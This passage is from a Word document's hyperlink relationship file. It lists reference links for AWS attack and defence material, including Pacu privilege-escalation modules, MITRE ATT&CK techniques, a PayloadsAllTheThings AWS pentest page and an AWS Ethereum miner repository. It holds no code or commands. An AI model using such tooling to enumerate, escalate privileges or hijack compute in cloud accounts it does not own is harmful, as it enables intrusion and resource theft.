Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1526" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#iam__enum_permissions" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1069/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#iam__privesc_scan" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/https://attack.mitre.org/techniques/T1078/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.checkov.io/5.Policy%20Index/terraform.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bridgecrewio/checkov" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mludvig/aws-ethereum-miner" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1496/" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ethermine.org/" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vz-risk/VCDB" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/working-with-templates-cfn-designer.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sweetcode.io/how-use-truffle-hog-git-secrets/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/trufflesecurity/trufflehog" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-profiles.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://boto3.amazonaws.com/v1/documentation/api/latest/index.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tldrsec.com/blog/lesser-known-aws-attacks/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#iam__enum_users" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/RhinoSecurityLabs/pacu/wiki/Module-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